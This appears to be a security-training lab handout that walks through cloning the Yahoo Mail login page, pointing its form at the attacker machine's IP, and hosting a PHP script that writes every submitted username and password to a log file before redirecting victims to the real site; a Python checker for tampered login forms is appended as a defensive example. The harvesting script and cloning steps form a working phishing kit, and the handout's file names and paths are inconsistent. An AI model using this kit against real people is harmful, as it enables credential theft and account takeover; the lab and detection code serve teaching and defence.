Phishing: Your Machine Is HACKER, Running Windows XP Professional. The IP Address of Your Machine Is 192.168.100.66/24
PHISHING
Configuration:
Your machine is HACKER, running Windows XP Professional.
The IP address of your machine is 192.168.100.66/24.
Objectives:
Learn how to set up a phishing site.
Tools:
Wamp Server
Notepad
Preparation:
Ensure that the HACKER machine is connected to the internet.
2011-BR
I. CREATING A FAKE WEBSITE
1. From your HACKER machine, open Mozilla Firefox and go to: http://mail.yahoo.com.
2. After the whole page has loaded, in Firefox go to the View > Page Source menu.
3. Then click File > Save Page As and save it as index.htm.
4. Open the index.htm file using WordPad.
5. Find the line containing action, then change the action link to:
http://192.168.100.66/login.htm
6. Then save the file to c:\wamp\www
II. SETTING UP THE WEBSERVER
1. From your HACKER machine, open Mozilla Firefox, navigate to c:\wamp\www
2. If there's an index.php file, delete it first.
3. Create a new text file, save it as login.php :
<?php
header('Location: http://www.yahoo.com');
$handle = fopen("loginlog.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>
4. Now activate your webserver: go to Start > Program > WampServer > Start Wampserver
5. Click on the wampserver icon at the bottom-right corner of your desktop, choose start all server, then click on PUT ONLINE
6. Open Mozilla Firefox, then type your server URL: http://192.168.100.66
You will see your fake Yahoo login screen. Try to log in using any username and password.
Because you have already modified the index.htm file, submitting the form executes
login.php inside C:\tools\wamp\www. You will then be redirected to www.yahoo.com.
7. Then navigate to C:\tools\wamp; you will find a new file, loginlog.txt. Open that file.
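Seen from the defender's side, the change made in section I step 5 is the detectable part of this lab: a password form whose action posts to a raw IP address over plain HTTP instead of the brand's own domain. The following check is an added example, not part of the original lab; the function and class names and the two sample pages are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress


class LoginFormAudit(HTMLParser):
    """Collect the action URL of every <form> that contains a password field."""
    def __init__(self):
        super().__init__()
        self._action, self._has_password = None, False  # state of the open form
        self.actions = []  # actions of forms that collect a password

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action, self._has_password = a.get("action") or "", False
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            if self._has_password:
                self.actions.append(self._action)
            self._action = None


def audit_login_forms(html, expected_domain):
    """Return (action, reasons) for each password form that looks tampered."""
    parser = LoginFormAudit()
    parser.feed(html)
    findings = []
    for action in parser.actions:
        url, reasons = urlparse(action), []
        host = url.hostname or ""
        if url.scheme == "http":
            reasons.append("credentials sent over plain HTTP")
        try:
            ipaddress.ip_address(host)
            reasons.append("action host is an IP literal")
        except ValueError:  # not an IP: compare the name with the expected domain
            if host and host != expected_domain and not host.endswith("." + expected_domain):
                reasons.append("action host outside " + expected_domain)
        if reasons:
            findings.append((action, reasons))
    return findings

# Constructed sample pages: one with a rewritten action, one pointing at the brand's domain.
TAMPERED = '<form method="post" action="http://192.168.100.66/login.htm"><input name="u"><input type="password" name="p"></form>'
CLEAN = '<form method="post" action="https://login.yahoo.com/account"><input type="password" name="p"></form>'
```

A mail gateway or web proxy can run the same check over fetched pages; relative actions are not flagged because they stay on the host that served the page.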